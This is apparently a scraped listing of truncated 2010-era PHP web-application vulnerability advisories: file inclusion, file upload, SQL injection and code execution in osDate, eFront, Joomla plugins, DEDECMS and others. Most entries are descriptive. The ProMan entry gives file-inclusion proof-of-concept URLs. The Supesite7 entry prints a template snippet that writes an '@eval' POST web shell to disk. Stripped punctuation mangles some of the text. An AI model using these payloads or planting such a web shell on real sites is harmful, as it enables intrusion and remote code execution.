CVE-2010-1055

Multiple PHP remote file inclusion vulnerabilities in osDate 2.1.9 and 2.5.4, when magicquotesgpc is disabled and registerglobals is enabled, allow remote attackers to execute arbitrary PHP code via a URL in the configforuminstalled parameter to 1 forum/adminLogin.php and 2 forum/userLogin.php...

eFront 'langname' Parameter Traversal Local File Inclusion

The version of eFront running on the remote web server is affected by a local file inclusion vulnerability due to improper sanitization of user-supplied input to the 'langname' parameter of the language.php script before using it to include PHP code. Regardless of PHP's 'registerglobals' setting,...

SA-CONTRIB-2010-027: Email Input Filter - Arbitrary code execution

Email Input Filter converts email style markup into web friendly format. Arbitrary code execution vulnerability in this module allows a remote attacker with the ability to create content using an input format with the email input filter enabled to execute arbitrary PHP code on an affected system...

DEDECMS v5. 5 Final select_soft_post.php vulnerability-vulnerability warning-the black bar safety net

Author:st0p Today only from Wolves Security Team to see toby57 large cattle released"DEDECMS v5. 5 GBK Final one. vulnerability"this article,the original address:http://bbs.wolvez.org/topic/125/ Your own local testing a bit,covering the SESSION this little chicken threat is true,because the reque...

ispCP Omega 'net2ftp_globals[application_skinsdir]' Parameter Remote File Include Vulnerability

ispCP Omega is prone to a remote file-include vulnerability because it fails to properly sanitize user-supplied input. An attacker can exploit this issue to include an arbitrary remote file containing malicious PHP code and execute it in the context of the webserver process. This may facilitate a...

InTerra Blog Machine <= 1.70 Shell Upload Vulnerability

Exploit for unknown platform in category web applications ======================================================= InTerra Blog Machine Exploit database separated by exploit 0 0 // type local, remote, DoS, etc. 1 1 0 -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-1 +...

CVE-2010-0755

PHP remote file inclusion vulnerability in include/WBmap.php in WikyBlog 1.7.3 rc2 allows remote attackers to execute arbitrary PHP code via a URL in the langFile parameter...

ProMan 0.1.1 - Multiple File Inclusions

ProMan Download: http://sourceforge.net/projects/pman/files/ RFI Code LFI Code includeonce'lang/'.$SESSION'userLang'.'/elisttasks.php'; if !defined'PROMAN' pexit $l'no hack'; PoC RFI: phpRAINCHECKpath/center.php?page=Shell PoC LFI: phpRAINCHECKpath/elisttasks.php?SESSIONuserLang=LFI%00...

trixbox Cisco Phone Services PhoneDirectory.php ID Parameter SQL Injection

The version of the Cisco Phone Services phone directory script 'cisco/services/PhoneDirectory.php' installed as part of the web interface for trixbox or Asterisk@Home, as it was formerly known and hosted on the remote web server fails to sanitize input to the 'ID' parameter before using it in a...

CVE-2010-0678

PHP remote file inclusion vulnerability in includes/moderation.php in Katalog Stron Hurricane 1.3.5, and possibly earlier, when registerglobals is enabled, allows remote attackers to execute arbitrary PHP code via a URL in the includesdirectory parameter...

Scriptegrator Plugin for Joomla! 'files[]' Parameter Remote File Include

The version of the Core Design Scriptegrator plugin for Joomla! running on the remote host is affected by a remote file include vulnerability due to improper sanitization of user-supplied input to the 'files' parameter before using it in the cdscriptegrator/libraries/highslide/js/jsloader.php...

Open Flash Chart/Pwiki Remote Code Execution Vulnerability

Exploit for unknown platform in category web applications ========================================================== Open Flash Chart/Pwiki Remote Code Execution Vulnerability ========================================================== Author: GoLdeN-z3r0 Title: Open Flash Chart/Pwiki Remote Code...

openSUSE Security Update : horde (horde-1947)

This update of horde fixes : - CVE-2009-3236: CVSS v2 Base Score: 5.0: Overwrite arbitrary files and execute PHP code - CVE-2009-3237: CVSS v2 Base Score: 5.0: Cross-Site Scripting XSS - CVE-2009-3701: CVSS v2 Base Score: 4.3: Cross-Site Scripting XSS - CVE-2009-4363: CVSS v2 Base Score: 4.3:...

SA-CONTRIB-2010-015 - Signwriter - Arbitrary code execution

The Signwriter module allows the use of TrueType fonts to replace text in headings, blocks, menus and filtered text. This vulnerability allows a remote attacker with the ability to create content using an input filter created with a Signwriter profile to execute arbitrary PHP code on an affected...

TinyBrowser Component for Joomla! 'tinybrowser_lang' Cookie Local File Include

The version of the TinyBrowser component for Joomla! running on the remote host is affected by a local file include vulnerability due to improper sanitization of user-supplied input to the 'tinybrowserlang' cookie before using it in the tinymce/plugins/tinybrowser/folders.php script to include PH...

Bits Video Script 2.042.05 - register.php Arbitrary File Upload Arbitrary PHP Code Execution

Bits Video Script 2.042.05 - register.php Arbitrary File Upload Arbitrary PHP Code Execution source: https://www.securityfocus.com/bid/40712/info Bits Video Script is prone to multiple arbitrary-file-upload vulnerabilities because it fails to properly sanitize user-supplied input. An attacker can...

Bits Video Script 2.042.05 - addvideo.php Arbitrary File Upload Arbitrary PHP Code Execution

Bits Video Script 2.042.05 - addvideo.php Arbitrary File Upload Arbitrary PHP Code Execution source: https://www.securityfocus.com/bid/40712/info Bits Video Script is prone to multiple arbitrary-file-upload vulnerabilities because it fails to properly sanitize user-supplied input. An attacker can...

Bits Video Script 2.04/2.05 - &#039;/addvideo.php&#039; Arbitrary File Upload / Arbitrary PHP Code Execution

source: https://www.securityfocus.com/bid/40712/info Bits Video Script is prone to multiple arbitrary-file-upload vulnerabilities because it fails to properly sanitize user-supplied input. An attacker can exploit these vulnerabilities to upload arbitrary code and run it in the context of the...

Bits Video Script 2.04/2.05 - &#039;/register.php&#039; Arbitrary File Upload / Arbitrary PHP Code Execution

source: https://www.securityfocus.com/bid/40712/info Bits Video Script is prone to multiple arbitrary-file-upload vulnerabilities because it fails to properly sanitize user-supplied input. An attacker can exploit these vulnerabilities to upload arbitrary code and run it in the context of the...

Supesite7 the background to get shell-vulnerability warning-the black bar safety net

PHP code !-- eval $content = "@eval$POSTc";-- !-- eval $test1 = ""."?"." php ".$ content."?& gt;";-- !-- eval fputsfopenSROOT.'./ templates/default/modelcache.php','w+',$test1;-- Edit the template when writing these few lines,disassemble the written word,on the line...